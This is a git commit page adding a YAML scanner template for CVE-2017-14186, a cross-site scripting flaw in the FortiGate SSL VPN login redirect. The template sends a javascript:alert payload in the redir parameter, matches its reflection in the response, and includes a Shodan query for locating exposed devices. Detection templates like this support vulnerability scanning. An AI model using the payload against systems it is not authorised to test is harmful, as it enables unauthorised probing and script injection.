Merge pull request #5432 from johnk3r/master

CVE-2017-14186
2022-09-23 16:14:42 +05:30 · 2022-09-23 16:14:42 +05:30 · 2ed337931f
parent 6c5c1b477f 448b5cb32c
commit 2ed337931f
1 changed files with 38 additions and 0 deletions
--- a/cves/2017/CVE-2017-14186.yml
+++ b/cves/2017/CVE-2017-14186.yml
@ -0,0 +1,38 @@
+id: CVE-2017-14186
+
+info:
+  name: FortiGate SSL VPN Web Portal - Cross Site Scripting
+  author: johnk3r
+  severity: medium
+  description: |
+    Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
+  reference:
+    - https://www.fortiguard.com/psirt/FG-IR-17-242
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-14186
+  classification:
+    cve-id: CVE-2017-14186
+  metadata:
+    verified: true
+    shodan-query: port:10443 http.favicon.hash:945408572
+  tags: cve,cve2017,fortigate,xss,fortinet
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200